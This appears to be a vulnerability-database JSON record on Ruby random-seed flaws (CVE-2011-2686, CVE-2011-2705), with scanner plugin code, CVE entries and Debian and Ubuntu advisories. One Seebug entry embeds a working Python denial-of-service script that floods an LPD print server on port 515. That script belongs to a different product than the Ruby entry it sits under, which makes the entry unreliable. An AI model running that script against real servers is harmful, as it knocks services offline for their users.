(deb_check(release:\"6.0\", prefix:\"ruby1.9.1-elisp\", reference:\"1.9.2.0-2+deb6u4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"ruby1.9.1-examples\", reference:\"1.9.2.0-2+deb6u4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"ruby1.9.1-full\", reference:\"1.9.2.0-2+deb6u4\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "ubuntucve": [{"lastseen": "2021-11-22T21:56:28", "description": "The SecureRandom.random_bytes function in lib/securerandom.rb in Ruby\nbefore 1.8.7-p352 and 1.9.x before 1.9.2-p290 relies on PID values for\ninitialization, which makes it easier for context-dependent attackers to\npredict the result string by leveraging knowledge of random strings\nobtained in an earlier process with the same PID.\n\n#### Bugs\n\n * <https://bugzilla.redhat.com/show_bug.cgi?id=722415>\n * <http://redmine.ruby-lang.org/issues/4579>\n * <http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=635878>\n", "cvss3": {}, "published": "2011-08-05T00:00:00", "type": "ubuntucve", "title": "CVE-2011-2705", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2705"], "modified": "2011-08-05T00:00:00", "id": "UB:CVE-2011-2705", "href": "https://ubuntu.com/security/CVE-2011-2705", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-11-22T21:56:28", "description": "Ruby before 1.8.7-p352 does not reset the random seed upon forking, which\nmakes it easier for context-dependent attackers to predict the values of\nrandom numbers by leveraging knowledge of the number sequence obtained in a\ndifferent child process, a related issue to CVE-2003-0900. NOTE: this\nissue exists because of a regression during Ruby 1.8.6 development.\n\n#### Bugs\n\n * <https://bugzilla.redhat.com/show_bug.cgi?id=722415>\n * <http://redmine.ruby-lang.org/issues/show/4338>\n * <http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=635878>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | ruby1.8 only \n[tyhicks](<https://launchpad.net/~tyhicks>) | Simple test case in upstream bug's description\n", "cvss3": {}, "published": "2011-08-05T00:00:00", "type": "ubuntucve", "title": "CVE-2011-2686", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2686"], "modified": "2011-08-05T00:00:00", "id": "UB:CVE-2011-2686", "href": "https://ubuntu.com/security/CVE-2011-2686", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "cve": [{"lastseen": "2022-03-23T12:14:39", "description": "The SecureRandom.random_bytes function in lib/securerandom.rb in Ruby before 1.8.7-p352 and 1.9.x before 1.9.2-p290 relies on PID values for initialization, which makes it easier for context-dependent attackers to predict the result string by leveraging knowledge of random strings obtained in an earlier process with the same PID.", "cvss3": {}, "published": "2011-08-05T21:55:00", "type": "cve", "title": "CVE-2011-2705", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2705"], "modified": "2012-01-19T03:58:00", "cpe": ["cpe:/a:ruby-lang:ruby:1.9.0-0", "cpe:/a:ruby-lang:ruby:1.9.1", "cpe:/a:ruby-lang:ruby:1.9.0-20060415", "cpe:/a:ruby-lang:ruby:1.8.7-173", "cpe:/a:ruby-lang:ruby:1.8.7-299", "cpe:/a:ruby-lang:ruby:1.8.7-330", "cpe:/a:ruby-lang:ruby:1.9.2-p180", "cpe:/a:ruby-lang:ruby:1.8.7-249", "cpe:/a:ruby-lang:ruby:1.8.7-334", "cpe:/a:ruby-lang:ruby:1.9.2-p136", "cpe:/a:ruby-lang:ruby:1.9.0-20070709", "cpe:/a:ruby-lang:ruby:1.9.2", "cpe:/a:ruby-lang:ruby:1.8.7", "cpe:/a:ruby-lang:ruby:1.9.0", "cpe:/a:ruby-lang:ruby:1.8.7-p21", "cpe:/a:ruby-lang:ruby:1.9.0-2", "cpe:/a:ruby-lang:ruby:1.8.7-248", "cpe:/a:ruby-lang:ruby:1.8.7-302", "cpe:/a:ruby-lang:ruby:1.8.7-160", "cpe:/a:ruby-lang:ruby:1.9.0-1", "cpe:/a:ruby-lang:ruby:1.9"], "id": "CVE-2011-2705", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-2705", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:ruby-lang:ruby:1.9.1:-rc2:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.7-334:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.9.1:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.9.2:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.9.1:-p129:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.9.1:-p243:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.9.1:-rc1:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.7-299:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.9.0:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.7-330:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.9.1:-p376:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.7-173:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.7-302:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.9.0:r18423:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.9.0-1:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.7:p72:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.9.2-p180:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.9:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.9.0-20070709:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.9.2:dev:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.9.0-20060415:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.7:p71:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.7-160:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.7-249:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.9.2-p136:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.7:p22:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.7-p21:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.9.0-2:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.7-248:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.9.0-0:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.9.1:-preview_2:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.9:r18423:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.9.1:-p429:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.9.1:-p0:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.9.1:-preview_1:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:14:18", "description": "Ruby before 1.8.7-p352 does not reset the random seed upon forking, which makes it easier for context-dependent attackers to predict the values of random numbers by leveraging knowledge of the number sequence obtained in a different child process, a related issue to CVE-2003-0900. NOTE: this issue exists because of a regression during Ruby 1.8.6 development.", "cvss3": {}, "published": "2011-08-05T21:55:00", "type": "cve", "title": "CVE-2011-2686", "cwe": ["CWE-310"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0900", "CVE-2011-2686"], "modified": "2017-08-29T01:29:00", "cpe": ["cpe:/a:ruby-lang:ruby:1.8.7-248", "cpe:/a:ruby-lang:ruby:1.8.7-249", "cpe:/a:ruby-lang:ruby:1.8.7", "cpe:/a:ruby-lang:ruby:1.8.7-302", "cpe:/a:ruby-lang:ruby:1.8.7-173", "cpe:/a:ruby-lang:ruby:1.8.7-299", "cpe:/a:ruby-lang:ruby:1.8.7-334", "cpe:/a:ruby-lang:ruby:1.8.7-160", "cpe:/a:ruby-lang:ruby:1.8.7-330", "cpe:/a:ruby-lang:ruby:1.8.7-p21"], "id": "CVE-2011-2686", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-2686", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:ruby-lang:ruby:1.8.7-299:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.7-249:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.7-160:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.7-330:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.7:p22:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.7-p21:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.7-173:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.7-302:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.7-248:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.7-334:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.7:p72:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.7:p71:*:*:*:*:*:*"]}], "seebug": [{"lastseen": "2017-11-19T18:01:09", "description": "BUGTRAQ ID: 49015\r\nCVE ID: CVE-2011-2686\r\n\r\nRuby\u662f\u4e00\u79cd\u529f\u80fd\u5f3a\u5927\u7684\u9762\u5411\u5bf9\u8c61\u7684\u811a\u672c\u8bed\u8a00\u3002\r\n\r\nRuby\u5728\u5904\u7406\u968f\u673a\u6570\u5b57\u751f\u6210\u7684\u5b9e\u73b0\u4e0a\u5b58\u5728\u672c\u5730\u62d2\u7edd\u670d\u52a1\u6f0f\u6d1e\uff0c\u672c\u5730\u653b\u51fb\u8005\u53ef\u5229\u7528\u6b64\u6f0f\u6d1e\u9020\u6210\u62d2\u7edd\u670d\u52a1\u3002\n\nYukihiro Matsumoto Ruby 1.8.7 x\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nYukihiro Matsumoto\r\n------------------\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://www.ruby-lang.org/", "published": "2011-08-06T00:00:00", "title": "Ruby\u968f\u673a\u6570\u5b57\u751f\u6210\u672c\u5730\u62d2\u7edd\u670d\u52a1\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-2686"], "modified": "2011-08-06T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-20813", "id": "SSV:20813", "sourceData": "\n #!/usr/bin/python\r\n#Title: Omnicom Alpha 4.0e LPD Server DoS\r\n#Author: Craig Freyman (@cd1zz)\r\n#Software Download: http://www.omnicomtech.com/download/bin/lpd.exe\r\n#Tested on: Windows XP SP3 (English), Server 2003 SP2 (English)\r\n#Dates: Bug Found 7/27/2011, Vendor Notified 8/1/2011, Vendor Responded 8/2/2011, Vendor approved release 8/3/2011\r\n#Notes: For this exploit to work, you must know the name of a printer queue on the server. \r\n\r\nimport socket,sys,time\r\n\r\nif len(sys.argv) &lt; 3:\r\n\tprint &quot;[-]Usage: %s &lt;target addr&gt; &lt;queue name&gt;&quot; % sys.argv[0]\r\n\tsys.exit(0)\r\n\r\ntarget = sys.argv[1]\r\nqueue = sys.argv[2]\r\n\r\ncounter = 1\r\ncrash = &quot;\\x41&quot; * 7500\r\n\r\ns = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\r\n\r\ntry:\r\n\twhile counter&lt;=50:\r\n\t\tprint &quot;[*] Left jab &quot;+str(counter)+&quot; times.&quot;\r\n\t\ts = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\r\n\t\ts.connect((target,515))\r\n\t\ts.send(&quot;\\x02&quot;+queue+&quot; &quot;+crash+&quot;LF&quot;)\r\n\t\ttime.sleep(.25)\r\n\t\tcounter+=1\r\nexcept:\r\n \tprint &quot;[-] &quot;+target+&quot; has been knocked out with a right hook!&quot;\r\n \tsys.exit(0)\r\n\r\n\r\n\n ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-20813"}], "ubuntu": [{"lastseen": "2022-01-04T13:07:15", "description": "Drew Yao discovered that the WEBrick HTTP server was vulnerable to cross-site \nscripting attacks when displaying error pages. A remote attacker could use this \nflaw to run arbitrary web script. (CVE-2010-0541)\n\nDrew Yao discovered that Ruby's BigDecimal module did not properly allocate \nmemory on 64-bit platforms. An attacker could use this flaw to cause a denial \nof service or possibly execute arbitrary code with user privileges. \n(CVE-2011-0188)\n\nNicholas Jefferson discovered that the FileUtils.remove_entry_secure method in \nRuby did not properly remove non-empty directories. An attacker could use this \nflaw to possibly delete arbitrary files. (CVE-2011-1004)\n\nIt was discovered that Ruby incorrectly allowed untainted strings to be \nmodified in protective safe levels. An attacker could use this flaw to bypass \nintended access restrictions. (CVE-2011-1005)\n\nEric Wong discovered that Ruby does not properly reseed its pseudorandom number \ngenerator when creating child processes. An attacker could use this flaw to \ngain knowledge of the random numbers used in other Ruby child processes. \n(CVE-2011-2686)\n\nEric Wong discovered that the SecureRandom module in Ruby did not properly seed \nits pseudorandom number generator. An attacker could use this flaw to gain \nknowledge of the random numbers used by another Ruby process with the same \nprocess ID number. (CVE-2011-2705)\n\nAlexander Klink and Julian W\u00e4lde discovered that Ruby computed hash values \nwithout restricting the ability to trigger hash collisions predictably. A \nremote attacker could cause a denial of service by crafting values used in hash \ntables. (CVE-2011-4815)\n", "cvss3": {}, "published": "2012-02-28T00:00:00", "type": "ubuntu", "title": "Ruby vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4815", "CVE-2011-0188", "CVE-2011-2705", "CVE-2010-0541", "CVE-2011-1004", "CVE-2011-2686", "CVE-2011-1005"], "modified": "2012-02-28T00:00:00", "id": "USN-1377-1", "href": "https://ubuntu.com/security/notices/USN-1377-1", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "debian": [{"lastseen": "2021-10-23T22:35:32", "description": "Package : ruby1.8\nVersion : 1.8.7.302-2squeeze3\nCVE ID : CVE-2011-0188 CVE-2011-2686 CVE-2011-2705 CVE-2011-4815\n CVE-2014-8080 CVE-2014-8090\n\nThis update fixes multiple local and remote denial of service and remote code\nexecute problems:\n\nCVE-2011-0188 \n \nProperly allocate memory, to prevent arbitrary code execution or application \ncrash. Reported by Drew Yao.\n\nCVE-2011-2686\n\nReinitialize the random seed when forking to prevent CVE-2003-0900 like \nsituations.\n\nCVE-2011-2705 \n \nModify PRNG state to prevent random number sequence repeatation at forked \nchild process which has same pid. Reported by Eric Wong.\n\nCVE-2011-4815\n\nFix a problem with predictable hash collisions resulting in denial of service \n(CPU consumption) attacks. Reported by Alexander Klink and Julian Waelde.\n\nCVE-2014-8080\n\nFix REXML parser to prevent memory consumption denial of service via crafted \nXML documents. Reported by Willis Vandevanter.\n\nCVE-2014-8090\n\nAdd REXML::Document#document to complement the fix for CVE-2014-8080.\nReported by Tomas Hoger.\nAttachment:\nsignature.asc\nDescription: This is a digitally signed message part.\n", "cvss3": {}, "published": "2014-11-21T15:18:14", "type": "debian", "title": "[SECURITY] [DLA 88-1] ruby1.8 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0900", "CVE-2011-0188", "CVE-2011-2686", "CVE-2011-2705", "CVE-2011-4815", "CVE-2014-8080", "CVE-2014-8090"], "modified": "2014-11-21T15:18:14", "id": "DEBIAN:DLA-88-1:B6B6B", "href": "https://lists.debian.org/debian-lts-announce/2014/11/msg00007.html", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-12-19T05:14:05", "description": "Package : ruby1.8\nVersion : 1.8.7.302-2squeeze3\nCVE ID : CVE-2011-0188 CVE-2011-2686 CVE-2011-2705 CVE-2011-4815\n CVE-2014-8080 CVE-2014-8090\n\nThis update fixes multiple local and remote denial of service and remote code\nexecute problems:\n\nCVE-2011-0188 \n \nProperly allocate memory, to prevent arbitrary code execution or application \ncrash. Reported by Drew Yao.\n\nCVE-2011-2686\n\nReinitialize the random seed when forking to prevent CVE-2003-0900 like \nsituations.\n\nCVE-2011-2705 \n \nModify PRNG state to prevent random number sequence repeatation at forked \nchild process which has same pid. Reported by Eric Wong.\n\nCVE-2011-4815\n\nFix a problem with predictable hash collisions resulting in denial of service \n(CPU consumption) attacks. Reported by Alexander Klink and Julian Waelde.\n\nCVE-2014-8080\n\nFix REXML parser to prevent memory consumption denial of service via crafted \nXML documents. Reported by Willis Vandevanter.\n\nCVE-2014-8090\n\nAdd REXML::Document#document to complement the fix for CVE-2014-8080.\nReported by Tomas Hoger.\nAttachment:\nsignature.asc\nDescription: This is a digitally signed message part.\n", "cvss3": {}, "published": "2014-11-21T15:18:14", "type": "debian", "title": "[SECURITY] [DLA 88-1] ruby1.8 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0900", "CVE-2011-0188", "CVE-2011-2686", "CVE-2011-2705", "CVE-2011-4815", "CVE-2014-8080", "CVE-2014-8090"], "modified": "2014-11-21T15:18:14", "id": "DEBIAN:DLA-88-1:4DC9E", "href": "https://lists.debian.org/debian-lts-announce/2014/11/msg00007.html", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-06-28T23:42:43", "description": "Package : ruby1.9.1\nVersion : 1.9.2.0-2+deb6u4\nCVE ID : CVE-2011-0188 CVE-2011-2705 CVE-2012-4522 CVE-2013-0256\n CVE-2013-2065 CVE-2015-1855\n\nCVE-2011-0188\n The VpMemAlloc function in bigdecimal.c in the BigDecimal class in\n Ruby 1.9.2-p136 and earlier, as used on Apple Mac OS X before 10.6.7\n and other platforms, does not properly allocate memory, which allows\n context-dependent attackers to execute arbitrary code or cause a\n denial of service (application crash) via vectors involving creation\n of a large BigDecimal value within a 64-bit process, related to an\n &quot;integer truncation issue.&quot;\n\nCVE-2011-2705\n use upstream SVN r32050 to modify PRNG state to prevent random number\n sequence repeatation at forked child process which has same pid.\n Reported by Eric Wong.\n\nCVE-2012-4522\n The rb_get_path_check function in file.c in Ruby 1.9.3 before\n patchlevel 286 and Ruby 2.0.0 before r37163 allows context-dependent\n attackers to create files in unexpected locations or with unexpected\n names via a NUL byte in a file path.\n\nCVE-2013-0256\n darkfish.js in RDoc 2.3.0 through 3.12 and 4.x before\n 4.0.0.preview2.1, as used in Ruby, does not properly generate\n documents, which allows remote attackers to conduct cross-site\n scripting (XSS) attacks via a crafted URL.\n\nCVE-2013-2065\n (1) DL and (2) Fiddle in Ruby 1.9 before 1.9.3 patchlevel 426,\n and 2.0 before 2.0.0 patchlevel 195, do not perform taint checking for\n native functions, which allows context-dependent attackers to bypass\n intended $SAFE level restrictions.\n\nCVE-2015-1855\n OpenSSL extension hostname matching implementation violates RFC 6125", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2015-05-30T20:45:15", "type": "debian", "title": "[SECURITY] [DLA 235-1] ruby1.9.1 security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-0188", "CVE-2011-2705", "CVE-2012-4522", "CVE-2013-0256", "CVE-2013-2065", "CVE-2015-1855"], "modified": "2015-05-30T20:45:15", "id": "DEBIAN:DLA-235-1:FDEBD", "href": "https://lists.debian.org/debian-lts-announce/2015/05/msg00020.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "osv": [{"lastseen": "2022-07-07T03:54:18", "description": "\nThis update fixes multiple local and remote denial of service and remote code\nexecute problems:\n\n\n* [CVE-2011-0188](https://security-tracker.debian.org/tracker/CVE-2011-0188)\nProperly allocate memory, to prevent arbitrary code execution or application\ncrash. Reported by Drew Yao.\n* [CVE-2011-2686](https://security-tracker.debian.org/tracker/CVE-2011-2686)\nReinitialize the random seed when forking to prevent [CVE-2003-0900](https://security-tracker.debian.org/tracker/CVE-2003-0900) like\nsituations.\n* [CVE-2011-2705](https://security-tracker.debian.org/tracker/CVE-2011-2705)\nModify PRNG state to prevent random number sequence repeatation at forked\nchild process which has same pid. Reported by Eric Wong.\n* [CVE-2011-4815](https://security-tracker.debian.org/tracker/CVE-2011-4815)\nFix a problem with predictable hash collisions resulting in denial of service\n(CPU consumption) attacks. Reported by Alexander Klink and Julian Waelde.\n* [CVE-2014-8080](https://security-tracker.debian.org/tracker/CVE-2014-8080)\nFix REXML parser to prevent memory consumption denial of service via crafted\nXML documents. Reported by Willis Vandevanter.\n* [CVE-2014-8090](https://security-tracker.debian.org/tracker/CVE-2014-8090)\nAdd REXML::Document#document to complement the fix for [CVE-2014-8080](https://security-tracker.debian.org/tracker/CVE-2014-8080).\nReported by Tomas Hoger.\n\n\nFor Debian 6 Squeeze, these issues have been fixed in ruby1.8 version 1.8.7.302-2squeeze3\n\n\n", "cvss3": {}, "published": "2014-11-21T00:00:00", "type": "osv", "title": "ruby1.8 - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0900", "CVE-2011-0188", "CVE-2011-2686", "CVE-2011-2705", "CVE-2011-4815", "CVE-2014-8080", "CVE-2014-8090"], "modified": "2022-07-07T00:15:57", "id": "OSV:DLA-88-1", "href": "https://osv.dev/vulnerability/DLA-88-1", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-07-07T03:53:28", "description": "\n* [CVE-2011-0188](https://security-tracker.debian.org/tracker/CVE-2011-0188)\nThe VpMemAlloc function in bigdecimal.c in the BigDecimal class in\n Ruby 1.9.2-p136 and earlier, as used on Apple Mac OS X before 10.6.7\n and other platforms, does not properly allocate memory, which allows\n context-dependent attackers to execute arbitrary code or cause a\n denial of service (application crash) via vectors involving creation\n of a large BigDecimal value within a 64-bit process, related to an\n \"integer truncation issue.\"\n* [CVE-2011-2705](https://security-tracker.debian.org/tracker/CVE-2011-2705)\nuse upstream SVN r32050 to modify PRNG state to prevent random number\n sequence repeatation at forked child process which has same pid.\n Reported by Eric Wong.\n* [CVE-2012-4522](https://security-tracker.debian.org/tracker/CVE-2012-4522)\nThe rb\\_get\\_path\\_check function in file.c in Ruby 1.9.3 before\n patchlevel 286 and Ruby 2.0.0 before r37163 allows context-dependent\n attackers to create files in unexpected locations or with unexpected\n names via a NUL byte in a file path.\n* [CVE-2013-0256](https://security-tracker.debian.org/tracker/CVE-2013-0256)\ndarkfish.js in RDoc 2.3.0 through 3.12 and 4.x before\n 4.0.0.preview2.1, as used in Ruby, does not properly generate\n documents, which allows remote attackers to conduct cross-site\n scripting (XSS) attacks via a crafted URL.\n* [CVE-2013-2065](https://security-tracker.debian.org/tracker/CVE-2013-2065)\n(1) DL and (2) Fiddle in Ruby 1.9 before 1.9.3 patchlevel 426,\n and 2.0 before 2.0.0 patchlevel 195, do not perform taint checking for\n native functions, which allows context-dependent attackers to bypass\n intended $SAFE level restrictions.\n* [CVE-2015-1855](https://security-tracker.debian.org/tracker/CVE-2015-1855)\nOpenSSL extension hostname matching implementation violates RFC 6125\n\n\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2015-05-30T00:00:00", "type": "osv", "title": "ruby1.9.1 - security update", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, 